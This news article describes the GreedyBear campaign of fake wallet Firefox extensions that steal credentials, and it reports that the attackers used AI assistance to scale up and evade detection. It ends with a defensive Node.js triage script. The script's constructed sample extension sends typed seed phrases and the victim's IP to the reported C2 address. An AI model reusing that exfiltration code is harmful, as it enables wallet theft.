150 Crypto-Draining Extensions Flood Firefox Add-On Store

A malicious campaign that Koi Security has named ‘GreedyBear’ has infiltrated the Mozilla Add-ons Store with 150 harmful Firefox extensions, reportedly stealing around $1,000,000 from unsuspecting victims. The extensions impersonate cryptocurrency wallet extensions from reputable projects such as MetaMask, TronLink and Rabby. The publishers first upload each extension in a benign form so that it passes Mozilla’s review, then let the listing accumulate fake positive reviews. Only afterwards do they strip the original branding, swap in new names and logos, and inject the malicious code that steals users’ wallet credentials and IP addresses. Because the reviews and history gathered by the benign version stay attached to the listing, a healthy-looking rating is no evidence that the current version is safe. The injected code works as a keylogger: it captures what the user types into the extension’s form fields and displayed popups and sends it to the attackers’ server.

Koi Security’s findings show that the weaponised extensions capture wallet credentials directly from the input fields in the extension’s own popup interface and exfiltrate them to a remote server controlled by the group. During initialisation the extensions also transmit the victim’s external IP address, most likely for tracking or targeting.

The crypto-draining operation is supported by numerous Russian-speaking pirated-software websites that distribute 500 distinct malware executables, alongside a network of sites impersonating Trezor, Jupiter Wallet and fake wallet repair services. All of these sites are linked to the same IP address, 185.208.156.66, which serves as the command-and-control hub for the GreedyBear operation; that single address is the most useful indicator for blocking and for hunting in proxy and DNS logs.

Koi Security reported its findings to Mozilla, which removed the offending extensions from the Firefox Add-ons Store. The report finds clear signs of AI-generated artefacts in the campaign’s code, and Koi attributes the scale of the scheme, and the speed with which it recovers from takedowns, to AI assistance that lets the attackers scale the operation and evade detection.

This is not the first such wave: last month more than 40 fake extensions masquerading as wallets from various platforms were found on the Firefox Store, and fraudulent extensions continue to get in despite the detection system for crypto-drainer add-ons that Mozilla introduced in June 2025. Koi Security also notes that the GreedyBear operators are exploring expansion into the Chrome Web Store, having already identified a malicious Chrome extension named “Filecoin Wallet” that uses the same data-theft logic and communicates with the same IP address.
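As an added example of the detection side of this (not code from Koi Security’s report, from Mozilla’s scanner, or from the campaign itself), the following Node.js script is a static triage pass over an unpacked extension’s JavaScript. It looks for the combination described above: an input or form listener in the extension’s own popup wired to a network send whose destination is a raw IP literal, plus an external-IP lookup at start-up. The heuristics, the function names and the two constructed sample extensions are assumptions made for the illustration; only the hub address 185.208.156.66 is taken from the report.

```javascript
// Added example, not code from the Koi Security report, Mozilla or the
// campaign: a static triage pass over an unpacked extension's JavaScript.
// It flags the combination described in the text: input capture in the
// extension's own popup wired to a network send whose destination is a raw
// IP literal, plus an external-IP lookup at start-up. Heuristics, names and
// the two sample extensions are constructed here (assumptions); only the hub
// address 185.208.156.66 is taken from the report.

const KNOWN_C2 = new Set(["185.208.156.66"]); // hub address reported by Koi Security

// A listener on a form or input event in the extension's own UI.
const INPUT_CAPTURE =
  /addEventListener\s*\(\s*['"](?:input|keydown|keyup|keypress|change|submit)['"]/;
// A URL whose host is an IPv4 literal; legitimate wallets talk to named RPC hosts.
const IP_URL = /https?:\/\/((?:\d{1,3}\.){3}\d{1,3})(?::\d+)?\//g;
// Public "what is my IP" services, used to learn the victim's external address.
const IP_LOOKUP = /\b(?:ipify|ipinfo|ip-api|icanhazip|ifconfig\.me)\b/i;

// Hosts of every IP-literal URL in the source, loopback excluded.
function ipHosts(src) {
  const hosts = new Set();
  for (const m of src.matchAll(IP_URL)) {
    if (!m[1].startsWith("127.")) hosts.add(m[1]);
  }
  return [...hosts];
}

// Triage one extension; `files` maps a file name to its JavaScript source.
// The verdict is a triage hint only: a human still reads every flagged file.
function triageExtension(files) {
  const findings = [];
  for (const [name, src] of Object.entries(files)) {
    const hosts = ipHosts(src);
    for (const h of hosts) {
      findings.push(`${KNOWN_C2.has(h) ? "known-c2" : "ip-literal-url"} ${h} in ${name}`);
    }
    // Input capture alone is normal for a wallet popup; capture plus a send
    // to a raw IP is the combination worth a look.
    if (INPUT_CAPTURE.test(src) && hosts.length > 0) {
      findings.push(`capture-and-send in ${name}`);
    }
    if (IP_LOOKUP.test(src)) findings.push(`external-ip-lookup in ${name}`);
  }
  const verdict =
    findings.length === 0 ? "clean"
      : findings.some((f) => f.startsWith("known-c2")) || findings.length >= 2 ? "suspicious"
      : "review";
  return { verdict, findings };
}

// Constructed sample: a benign wallet popup that also reads input and uses fetch.
const BENIGN = {
  "popup.js": `
    document.querySelector("form").addEventListener("submit", async (e) => {
      e.preventDefault();
      const r = await fetch("https://rpc.example-wallet.invalid/balance");
      render(await r.json());
    });`,
};

// Constructed sample shaped like the behaviour the report describes.
const SUSPICIOUS = {
  "popup.js": `
    const seed = document.getElementById("seed");
    seed.addEventListener("input", () => {
      fetch("http://185.208.156.66/collect", { method: "POST", body: seed.value });
    });`,
  "background.js": `
    fetch("https://api.ipify.org?format=json").then((r) => r.json())
      .then((j) => fetch("http://185.208.156.66/init?ip=" + j.ip));`,
};

function demo() {
  return { benign: triageExtension(BENIGN), suspicious: triageExtension(SUSPICIOUS) };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with `node`; `demo()` triages both samples. The benign sample carries the caveat: a real wallet popup also listens to form events and calls `fetch`, so input capture on its own is not a signal. What separates the two is the destination (a raw IP literal instead of a named RPC host), the start-up IP lookup, and the known hub address. Regex triage of this kind is a first filter for a batch of unpacked .xpi files, not a verdict; obfuscated code and dynamically assembled URLs will slip past it.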

Categories: Cybersecurity Threats, Malicious Software Distribution, Cryptocurrency Scams 

Tags: GreedyBear, Malicious Campaign, Firefox, Extensions, Cryptocurrency, Keylogger, IP Address, Malware, Command-and-Control, AI-Generated 
